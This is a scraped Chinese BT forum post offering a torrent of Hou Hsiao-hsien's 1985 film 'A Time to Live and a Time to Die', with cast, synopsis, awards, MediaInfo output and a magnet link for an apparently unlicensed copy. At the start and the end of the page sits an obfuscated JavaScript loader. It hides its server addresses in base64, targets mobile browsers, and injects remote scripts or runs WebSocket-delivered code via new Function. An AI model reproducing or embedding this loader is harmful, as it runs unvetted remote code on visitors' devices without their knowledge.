童年往事[国语配音/中文字幕].A.Time.to.Live.and.a.Time.to.Die.1985.1080p.BluRay.x265.10bit.DTS 7.72GB

版主小s 1月前 291

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 童年往事 / The Time to Live and the Time to Die / A Time to Live and a Time to Die / 生死同代

◎年 代 1985

◎产 地 中国台湾

◎类 别 剧情 / 家庭 / 传记

◎语 言 汉语普通话 / 闽南语 / 客家话

◎上映日期 1985-08-03(中国台湾)

◎IMDb链接 https://www.imdb.com/title/tt0090185/

◎豆瓣评分 8.8/10 (44492人评价)

◎豆瓣链接 https://movie.douban.com/subject/1300572/

◎片 长 137分钟

◎导 演 侯孝贤 Hsiao-hsien Hou (id:1093843)

◎编 剧 朱天文 Tien-wen Chu (id:1274364)

侯孝贤 Hsiao-hsien Hou (id:1093843)

◎演 员 游安顺 An-shun Yu (id:1339114)

田丰 Feng Tien (id:1019621)

梅芳 Fang Mei (id:1324911)

唐如韫 Ruyun Tang (id:1339111)

萧艾 Ai Hsiao (id:1275727)

吴素莹 Su-Ying Wu (id:1373724)

陈淑芳 Shu-Fang Chen (id:1339273)

辛树芬 Shu-fen Hsin (id:1274698)

严圣华 Sheng-hua Yen (id:1373725)

周栋宏 Tung-hung Chou (id:1373726)

陈汉文 Han-wen Chen (id:1373727)

胡翔评 Hsiang-Ping Hu (id:1373729)

林崇文 Chung-Wen Lin (id:1373730)

高重黎 Chung-Li Kao (id:1373731)

陶德辰 Te-chen Tao (id:1352716)

陈志贞 Chi-Chen Chen (id:1373841)

江宝德 Bao-te Chiang (id:1373732)

张宁 Ning Chang (id:1373837)

罗泽中 Tse-chung Lo (id:1373838)

罗诚业 Cheng-ye Lo (id:1373734)

张家宝 Chia-bao Chang (id:1373733)

罗勋琳 Shun-lin Lo (id:1373839)

刘国宾 Kuo-bin Liu (id:1373840)

张华坤 Hwa-Kun Chang (id:1398858)

徐国良 Kuo-Liang Hsu (id:1339929)

林登飞 Dengfei Lin (id:1440158)

张弘毅 Hong-Yee Chang (id:1333814)

李屏宾 Mark Lee Ping Bing (id:1274482)

廖庆松 Ching-Song Liao (id:1312523)

林崇文 Chung-Wen Lin (id:1373730)

杜笃之 Du-Che Tu (id:1275159)

忻江盛 Chiang-Sheng Hsin (id:1377239)

蔡琴 Chin Tsai (id:1074903)

◎标 签 侯孝贤 / 台湾 / 台湾电影 / 童年往事 / 童年 / 侯孝賢 / 1985 / 成长

◎简 介

从大陆迁往台湾的一家人,在表面平静的日子下,各怀心事。祖母(唐如韫)对大陆念念不忘,一心想回去;父(田丰)母(梅芳)虽也有“外省人” 身份的尴尬,却也清楚知道回大陆只是梦一场;姐姐(萧艾)差不多已当自己是台湾本地人,偶尔伤心落泪是因想起为替父母分重担放弃了念大学;小孩子阿孝咕(游安顺),则只想着自己如何玩得痛快,完全没有大陆的概念,而对父亲的死,他只觉突然并无太多伤心。

可是因为家庭的特殊,懵懂中阿孝咕也知自己并不完全相同于同龄人。尽管表面上他做着多数成长中男孩都会做的事(四处打架、开始中意某个女孩子),内里却已埋下会突然裂变的种子,只等某个契机的来临。

◎获奖情况 (共7项)

第36届柏林国际电影节 (1986)

费比西奖(国际影评人联盟奖) 论坛及新电影论坛最佳影片

└──侯孝贤 (id:1093843)

第22届台北金马影展 (1985)

金马奖 最佳剧情片(提名)

金马奖 最佳导演(提名)

└──侯孝贤 (id:1093843)

金马奖 最佳女配角

└──唐如韫 (id:1339111)

金马奖 最佳原著剧本

金马奖 最佳原创配乐(提名)

└──吴楚楚 (id:1362047)

金马奖 最佳音效(提名)

└──忻江盛 (id:1377239)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 272249154225465027824315648247602123136 (0xCCD147A3F79FDD4C6B976C57C60C9180)

  4. Complete name : A.Time.t[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.72 GiB

  8. Duration : 2 h 16 min

  9. Overall bit rate : 8 066 kb/s

  10. Movie name : UN TEMPS POUR VIVRE, UN TEMPS POUR MOURIR

  11. Encoded date : UTC 2021-10-14 04:33:17

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 2 h 16 min

  23. Bit rate : 7 286 kb/s

  24. Width : 1 920 pixels

  25. Height : 1 036 pixels

  26. Display aspect ratio : 1.85:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.153

  33. Stream size : 6.97 GiB (90%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=18.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1036 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio

  39. ID : 2

  40. ID in the original source medium : 4352 (0x1100)

  41. Format : DTS

  42. Format/Info : Digital Theater Systems

  43. Codec ID : A_DTS

  44. Duration : 2 h 16 min

  45. Bit rate mode : Constant

  46. Bit rate : 768 kb/s

  47. Channel(s) : 1 channel

  48. Channel layout : C

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 93.750 FPS (512 SPF)

  51. Bit depth : 24 bits

  52. Compression mode : Lossy

  53. Stream size : 752 MiB (10%)

  54. Language : Chinese

  55. Default : Yes

  56. Forced : No

  57. Original source medium : Blu-ray


  58. Text #1

  59. ID : 3

  60. ID in the original source medium : 4609 (0x1201)

  61. Format : PGS

  62. Muxing mode : zlib

  63. Codec ID : S_HDMV/PGS

  64. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  65. Duration : 2 h 14 min

  66. Bit rate : 10.5 kb/s

  67. Count of elements : 1840

  68. Stream size : 10.1 MiB (0%)

  69. Title : chs

  70. Language : Chinese

  71. Default : Yes

  72. Forced : No

  73. Original source medium : Blu-ray


  74. Text #2

  75. ID : 4

  76. ID in the original source medium : 4610 (0x1202)

  77. Format : PGS

  78. Muxing mode : zlib

  79. Codec ID : S_HDMV/PGS

  80. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  81. Duration : 2 h 14 min

  82. Bit rate : 10.6 kb/s

  83. Count of elements : 1840

  84. Stream size : 10.2 MiB (0%)

  85. Title : cht

  86. Language : Chinese

  87. Default : No

  88. Forced : No

  89. Original source medium : Blu-ray


  90. Menu

  91. 00:00:00.000 : en:第 01 章

  92. 00:03:55.610 : en:第 02 章

  93. 00:13:20.758 : en:第 03 章

  94. 00:24:50.530 : en:第 04 章

  95. 00:36:38.946 : en:第 05 章

  96. 00:47:54.705 : en:第 06 章

  97. 00:58:23.750 : en:第 07 章

  98. 01:08:12.088 : en:第 08 章

  99. 01:16:52.941 : en:第 09 章

  100. 01:22:33.114 : en:第 10 章

  101. 01:31:22.185 : en:第 11 章

  102. 01:42:08.747 : en:第 12 章

  103. 01:49:27.561 : en:第 13 章

  104. 02:02:07.028 : en:第 14 章

  105. 02:10:45.045 : en:第 15 章

  106. 02:15:46.388 : en:第 16 章


TAGS 剧情 家庭 传记

磁力链:
  • magnet:?xt=urn:btih:21BC6D277A0DD57922038E2E4C71601BE66BFF8B

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};